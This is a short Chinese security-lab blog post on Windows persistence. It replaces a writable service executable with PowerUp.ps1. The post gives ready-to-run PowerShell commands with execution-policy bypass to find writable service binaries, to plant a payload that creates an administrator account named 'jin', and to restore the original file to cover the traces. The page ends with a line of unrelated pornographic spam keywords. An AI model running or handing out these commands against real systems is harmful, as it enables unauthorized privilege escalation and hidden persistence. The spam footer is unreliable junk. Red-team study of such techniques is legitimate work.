<strike id="kne6g"><label id="kne6g"></label></strike>
      


      
  
      
    
  
      

  




  
      
     
      
        
        
            
        •         
      
     
      
  
      
  
 







      
     
      
        
      

 


      
     
      咨詢服務(wù)熱線
      
     
      400-6446-808
      
   
      
   
   

      

        
        
        
      
           
      
              
      創(chuàng)安實(shí)驗(yàn)室專欄
      
              
      您的當(dāng)前位置:首頁(yè) > 創(chuàng)安實(shí)驗(yàn)室專欄
      
           
      
           
           
           
      
             
               
      

      
      
       windows利用常見(jiàn)程序進(jìn)行權(quán)限維持
      
        
      發(fā)布者:創(chuàng)信華通  發(fā)布時(shí)間:2023-02-24  瀏覽量:419次
      
        
        
      
             
                                        
         
      
        
        
        
       










      古語(yǔ)有云:“學(xué)如逆水行舟,不進(jìn)則退?!泵鎸?duì)如今隨時(shí)都在變化的網(wǎng)絡(luò)安全環(huán)境更是如此。為此,創(chuàng)信華通微信公眾號(hào)特開(kāi)設(shè)“創(chuàng)安實(shí)驗(yàn)室專欄”,以記錄創(chuàng)信華通創(chuàng)安實(shí)驗(yàn)室在技術(shù)上的探索,加強(qiáng)同行間的交流,相互學(xué)習(xí),共同進(jìn)步。

      ?+
      +
      windows利用常見(jiàn)程序進(jìn)行權(quán)限維持
      原理:利用PowerUp.ps1生成一個(gè)可以執(zhí)行我們構(gòu)造的惡意命令的同名可執(zhí)行程序并替換原本的可執(zhí)行程序。主程序執(zhí)行時(shí)調(diào)用同名可執(zhí)行程序來(lái)執(zhí)行我們構(gòu)造的惡意命令。
      查找具有可寫(xiě)的可執(zhí)行文件:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
      查看程序?qū)τ脩舻臋?quán)限:icacls "D:\tools\KGMusic\9.1.44.23567\service.exe"
      利用可執(zhí)行文件提權(quán),向可寫(xiě)程序中寫(xiě)入創(chuàng)建用戶的payload:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Write-ServiceEXE -ServiceName KugouService -Username jin -Password jin -Verbose}"
      等待服務(wù)重啟或?qū)?yīng)程序再次運(yùn)行:
      可以看到此時(shí)新建了一個(gè)管理員權(quán)限的用戶jin
      清理痕跡:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Restore-ServiceEXE -ServiceName KugouService}"

      E·N·D

      本文由創(chuàng)信華通創(chuàng)安實(shí)驗(yàn)室編輯。
      本文僅限于個(gè)人學(xué)習(xí)和技術(shù)研究,由于傳播、利用此文所提供的信息而造成刑事案件、非授權(quán)攻擊等違法行為,均由使用者本人負(fù)責(zé),本單位不為此承擔(dān)任何責(zé)任。創(chuàng)安攻防實(shí)驗(yàn)室擁有對(duì)此文章的修改和解釋權(quán),如欲轉(zhuǎn)載或傳播此文章,必須保證此文章的完整性,包括版權(quán)聲明等全部?jī)?nèi)容。

      如有侵權(quán),請(qǐng)聯(lián)系后臺(tái)。



      創(chuàng)安實(shí)驗(yàn)室
      創(chuàng)信華通創(chuàng)安實(shí)驗(yàn)室,是成都創(chuàng)信華通信息技術(shù)有限公司旗下的技術(shù)研究團(tuán)隊(duì),成立于2021年9月,主要研究紅藍(lán)對(duì)抗、重大安全保障、應(yīng)急響應(yīng)等方向。
      創(chuàng)安攻防實(shí)驗(yàn)室圓滿完成了多次公安舉辦的重要網(wǎng)絡(luò)安全保障和攻防演習(xí)活動(dòng),并積極參加各類網(wǎng)絡(luò)安全競(jìng)賽,屢獲殊榮。
      創(chuàng)安攻防實(shí)驗(yàn)室秉承創(chuàng)信華通的發(fā)展理念,致力打造國(guó)內(nèi)一流網(wǎng)絡(luò)安全團(tuán)隊(duì)。


      

                
                
        
      
      
      
  
  
      
                 
              
              
            
              
           
      
           
        
      
        
        
     
      
  
      





  
  
  
  
  

      




 



亚洲伊人久久大香线焦,欧美日韩国产高清一区二区三区,国产人免费人成免费视频,亚洲高清在线观看看片